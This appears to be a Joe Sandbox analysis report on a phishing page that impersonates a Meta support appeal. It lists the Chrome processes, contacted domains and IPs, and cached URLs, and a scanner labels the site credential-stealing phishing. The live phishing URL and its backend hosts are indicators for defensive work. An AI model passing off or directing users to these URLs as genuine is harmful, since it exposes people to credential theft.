Edit tour

Windows Analysis Report
https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/

Overview

General Information

Sample URL:	https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/
Analysis ID:	866965
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1292 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1832,i,15930897603703907416,9116632375895212833,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5500 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/ MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

cleanup

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

Source: classification engine

Classification label: mal48.win@32/99@22/16

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1832,i,15930897603703907416,9116632375895212833,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1832,i,15930897603703907416,9116632375895212833,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	2 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/	0%	Avira URL Cloud	safe
https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Source	Detection	Scanner	Label
https://www.internalfb.com/intern/invariant/	0%	URL Reputation	safe
https://youradchoices.ca/	0%	URL Reputation	safe
https://fburl.com/dialog-provider).	0%	URL Reputation	safe
https://fburl.com/wiki/xrzohrqb	0%	URL Reputation	safe
https://www.internalfb.com/intern/wiki/Redblock/Rules/#a-widget-must-not-use-it	0%	Avira URL Cloud	safe
https://meta-support-appeal-121990471.web.app/css/app.60ab892b.css	0%	Avira URL Cloud	safe
https://www.internalfb.com/intern/dimsum/geo/page/288287605465081/	0%	Avira URL Cloud	safe
https://www.internalfb.com/intern/dimsum/geo/colorsv2/Geodesic/usages/?theme=GeodesicColorSystemThem	0%	Avira URL Cloud	safe
https://meta-support-appeal-121990471.web.app/favicon.ico	0%	Avira URL Cloud	safe
https://www.internalfb.com/intern/dimsum/geo/page/2804322802968504/code/526592798178784/	0%	Avira URL Cloud	safe
https://meta-support-appeal-121990471.web.app/	0%	Avira URL Cloud	safe
https://www.internalfb.com/intern/wiki/Dolly/Accessibility/Common_Accessibility_Issues_In_Dolly/link	0%	Avira URL Cloud	safe
https://www.internalfb.com/intern/uidocs/engineering/430902554298754/	0%	Avira URL Cloud	safe
https://meta-support-appeal-121990471.web.app/js/app.ddb37ca9.js	0%	Avira URL Cloud	safe
https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
star-mini.c10r.facebook.com	157.240.17.35	true	false	high
star.c10r.facebook.com	157.240.17.17	true	false	high
accounts.google.com	172.217.16.173	true	false	high
api4.ipify.org	104.237.62.211	true	false	high
socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com	54.76.231.252	true	false	high
picamargarita.live	199.188.200.183	true	false	unknown
scontent.xx.fbcdn.net	157.240.17.15	true	false	high
k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com	52.212.57.111	true	false	high
facebook.com	157.240.17.35	true	false	high
www.google.com	172.217.16.164	true	false	high
clients.l.google.com	142.251.36.174	true	false	high
meta-support-appeal-121990471.web.app	199.36.158.100	true	false	unknown
unpkg.com	104.16.125.175	true	false	high
sockjs-eu.pusher.com	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
ws-eu.pusher.com	unknown	unknown	false	high
business.facebook.com	unknown	unknown	false	high
static.xx.fbcdn.net	unknown	unknown	false	high
clients2.google.com	unknown	unknown	false	high
api.ipify.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://meta-support-appeal-121990471.web.app/css/app.60ab892b.css	false	Avira URL Cloud: safe	unknown
https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/5jmuZJN2VS5.png	false		high
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/261/o0oamk7s/xhr_streaming?protocol=7&client=js&version=8.0.2&t=1684171658887&n=1	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/spGPd_6JCv5Ll8Dnx74OHmvW4e_cyZJww-_Y8k37tAmpDzUSipvyKyKqqpLnXe531mPHpIvUsyoq5HNSpSUTp_kHniEfe-1jsdB.css?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/_FlUVVh3xe5.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://facebook.com/security/hsts-pixel.gif	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__comet_req=1&__hs=19492.HYP%3Acomet_loggedout_pkg.2.1..0.0&__hsi=7233462154739422097&__req=9&__rev=1007493981&__s=%3A%3Ahfcgev&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171649&__user=0&dpr=1&jazoest=2956&lsd=AVrCkRhe-Nk&ph=C3	false		high
https://static.xx.fbcdn.net/rsrc.php/yU/r/WXBYOaYZuYu.woff2	false		high
https://meta-support-appeal-121990471.web.app/favicon.ico	false	Avira URL Cloud: safe	unknown
https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png	false		high
https://static.xx.fbcdn.net/rsrc.php/v3i_Ys4/y4/l/en_GB/BF9xRpiZkLatEBd9Fl3fwxV6vqO2Edt_KB0sP15jHXLtYZLH3mjxgMbGrZsAFrsvp9TCkiHj1Ua46OhF8I26OCDz8vH9EPv5BdUg2iiPCKmDINXBsK1ZwQ9RbRqijVMO9SgRmfnp2mXANzT2euuKkEudGBMTv1KZvh_jkvsWyi-E3KX-0OmKJdsWXJLngDefOXNT1BF402Ei2w4vLYwDglrM-7a0DCkzjnuGpspuhs8tjs3m7LoYlm25-h0gEJuh-HzznTLJKpDLwJ-Zqowp55HfXW__mMvsWqehdEtWwLim3uETseCBziC7kyfz8pwDQVEH-g-FDC.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/1ne8gceqDmj.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3ij9m4/yq/l/en_GB/48Tb9IT-gvY.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/3FPJ9YC_wUr.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/y6/r/IIXkOAm_FrJ.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/orKmdUnX93W.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0https%3A%2F%2Fbusiness.facebook.com%2Fbusiness%2Fhelp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/vQBVm8G9-Ug.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://static.xx.fbcdn.net/rsrc.php/v3iF-g4/ye/l/en_GB/tD-BEuev9ht.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/lVpR3ehjUFI.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__comet_req=1&__hs=19492.HYP%3Acomet_loggedout_pkg.2.1..0.0&__hsi=7233462154739422097&__req=8&__rev=1007493981&__s=%3A%3Ahfcgev&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171649&__user=0&dpr=1&jazoest=2956&lsd=AVrCkRhe-Nk&ph=C3	false		high
https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png	false		high
https://meta-support-appeal-121990471.web.app/	false	Avira URL Cloud: safe	unknown
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/879/46b7p3lg/xhr_send?t=1684171613327&n=2	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/jcLSyE_78Zc.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/0,cross/DP34d9XFbqH.css?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/ISoA4mVNE-i.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yx/r/Kfnpv8X7YWb.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/dEa9w9pp3b6.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/81IxDn2gHib.css?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/c7xaHhrP-96.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yz/l/0,cross/oA8DE2e8wpE.css?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__comet_req=1&__hs=19492.HYP%3Acomet_loggedout_pkg.2.1..0.0&__hsi=7233462154739422097&__req=3&__rev=1007493981&__s=%3A%3Ahfcgev&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171649&__user=0&dpr=1&jazoest=2956&lsd=AVrCkRhe-Nk&ph=C3	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/ryzpHH-Qnc0.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://unpkg.com/boxicons@2.1.4/fonts/boxicons.woff2	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/	true		unknown
https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/Dua6-U_r_Vq.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/870/ujk1o8qr/xhr_send?t=1684171631935&n=3	false		high
https://www.facebook.com/images/cookies/cookie_info_card_image_3.png	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yx/r/X9EjjNyND9C.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/data/manifest/	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/rO5OX6VwE2P.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/05yozQvgsqs.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/261/o0oamk7s/xhr_send?t=1684171659388&n=2	false		high
https://static.xx.fbcdn.net/rsrc.php/v3i4X-4/yb/l/en_GB/-EMzigvM81G.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__comet_req=1&__hs=19492.HYP%3Acomet_loggedout_pkg.2.1..0.0&__hsi=7233462154739422097&__req=6&__rev=1007493981&__s=%3A%3Ahfcgev&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171649&__user=0&dpr=1&jazoest=2956&lsd=AVrCkRhe-Nk&ph=C3	false		high
https://www.facebook.com/images/cookies/cookie_info_card_image_1.png	false		high
https://static.xx.fbcdn.net/rsrc.php/v3iCwx4/yu/l/en_GB/KXR0O6l9PcI.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/YT7n1sgH1lv.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/UGyIfkVwH7J.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/59/1bhhfumb/xhr_send?t=1684171673282&n=3	false		high
https://meta-support-appeal-121990471.web.app/#/	false		unknown
https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/pCa7948cSS8.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/879/46b7p3lg/xhr_send?t=1684171669171&n=4	false		high
https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU	false	Avira URL Cloud: safe	unknown
https://scontent.xx.fbcdn.net/hads-ak-prn2/1487645_6012475414660_1439393861_n.png	false		high
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/879/46b7p3lg/xhr_send?t=1684171640888&n=3	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__comet_req=1&__hs=19492.HYP%3Acomet_loggedout_pkg.2.1..0.0&__hsi=7233462154739422097&__req=1&__rev=1007493981&__s=%3A%3Ahfcgev&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171649&__user=0&dpr=1&jazoest=2956&lsd=AVrCkRhe-Nk&ph=C3	false		high
https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/870/ujk1o8qr/xhr_streaming?protocol=7&client=js&version=8.0.2&t=1684171601702&n=1	false		high
https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0https://business.facebook.com/business/help	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/Ib90vcVxYzI.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0,cross/3rxmFvVH71y.css?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19492.BP%3ADEFAULT.2.0..0.0&__hsi=7233462059333235520&__req=2&__rev=1007493981&__s=%3A%3A0cqfwl&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171627&__user=0&dpr=1&jazoest=2903&lsd=AVrkM2g9_2c	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__comet_req=1&__hs=19492.HYP%3Acomet_loggedout_pkg.2.1..0.0&__hsi=7233462154739422097&__req=5&__rev=1007493981&__s=%3A%3Ahfcgev&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171649&__user=0&dpr=1&jazoest=2956&lsd=AVrCkRhe-Nk&ph=C3	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/5CSkSjlkTxg.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://meta-support-appeal-121990471.web.app/js/app.ddb37ca9.js	false	Avira URL Cloud: safe	unknown
https://static.xx.fbcdn.net/rsrc.php/v3imlR4/yo/l/en_GB/KWa7zx5m951.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yy/r/iLiUvBzlh9w.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/MmAbYlgqG6Z.css?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19492.BP%3ADEFAULT.2.0..0.0&__hsi=7233462059333235520&__req=1&__rev=1007493981&__s=%3A%3A0cqfwl&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171627&__user=0&dpr=1&jazoest=2903&lsd=AVrkM2g9_2c	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dequeuniversity.com/rules/axe/3.4/listitem	chromecache_232.1.dr	false		high
https://dequeuniversity.com/rules/axe/3.4/definition-list	chromecache_232.1.dr	false		high
https://www.internalfb.com/intern/wiki/Redblock/Rules/#a-widget-must-not-use-it	chromecache_232.1.dr	false	Avira URL Cloud: safe	unknown
https://www.internalfb.com/intern/invariant/	chromecache_240.1.dr, chromecache_274.1.dr	false	URL Reputation: safe	unknown
https://www.internalfb.com/intern/dimsum/geo/colorsv2/Geodesic/usages/?theme=GeodesicColorSystemThem	chromecache_232.1.dr	false	Avira URL Cloud: safe	unknown
https://youradchoices.ca/	chromecache_232.1.dr	false	URL Reputation: safe	unknown
https://www.internalfb.com/intern/dimsum/geo/page/288287605465081/	chromecache_232.1.dr	false	Avira URL Cloud: safe	unknown
https://www.workplace.com/legal/FB_Work_Cookies	chromecache_276.1.dr	false		high
https://dequeuniversity.com/rules/axe/3.3/aria-dialog-name	chromecache_232.1.dr	false		high
https://dequeuniversity.com/rules/axe/3.3/	chromecache_232.1.dr	false		high
https://www.youronlinechoices.com/	chromecache_232.1.dr	false		high
https://fburl.com/dialog-provider).	chromecache_232.1.dr	false	URL Reputation: safe	unknown
https://api.ipify.org?format=json	chromecache_225.1.dr	false		high
https://www.internalfb.com/intern/dimsum/geo/page/2804322802968504/code/526592798178784/	chromecache_232.1.dr	false	Avira URL Cloud: safe	unknown
https://www.internalfb.com/intern/wiki/Dolly/Accessibility/Common_Accessibility_Issues_In_Dolly/link	chromecache_232.1.dr	false	Avira URL Cloud: safe	unknown
https://www.internalfb.com/intern/uidocs/engineering/430902554298754/	chromecache_232.1.dr	false	Avira URL Cloud: safe	unknown
https://dequeuniversity.com/rules/axe/3.4/list	chromecache_232.1.dr	false		high
https://pusher.com/	chromecache_275.1.dr	false		high
https://fburl.com/wiki/xrzohrqb	chromecache_232.1.dr	false	URL Reputation: safe	unknown
https://www.workplace.com/legal/WP_Work_Cookies	chromecache_276.1.dr	false		high
https://www.instagram.com/accounts/edit/	chromecache_232.1.dr	false		high
https://www.whatsapp.com/legal/cookies/	chromecache_276.1.dr	false		high
https://optout.aboutads.info/	chromecache_232.1.dr	false		high
https://fb.workplace.com/groups/cometeng/permalink/777450152748974/	chromecache_232.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.16.122.175	unknown	United States	13335	CLOUDFLARENETUS	false
142.251.36.174	clients.l.google.com	United States	15169	GOOGLEUS	false
199.188.200.183	picamargarita.live	United States	22612	NAMECHEAP-NETUS	false
157.240.17.35	star-mini.c10r.facebook.com	United States	32934	FACEBOOKUS	false
104.16.125.175	unpkg.com	United States	13335	CLOUDFLARENETUS	false
199.36.158.100	meta-support-appeal-121990471.web.app	United States	15169	GOOGLEUS	false
54.76.231.252	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
157.240.17.15	scontent.xx.fbcdn.net	United States	32934	FACEBOOKUS	false
52.212.57.111	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com	United States	16509	AMAZON-02US	false
157.240.17.17	star.c10r.facebook.com	United States	32934	FACEBOOKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.237.62.211	api4.ipify.org	United States	18450	WEBNXUS	false
52.211.192.36	unknown	United States	16509	AMAZON-02US	false
172.217.16.173	accounts.google.com	United States	15169	GOOGLEUS	false
172.217.16.164	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	866965
Start date and time:	2023-05-15 19:25:21 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.win@32/99@22/16
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
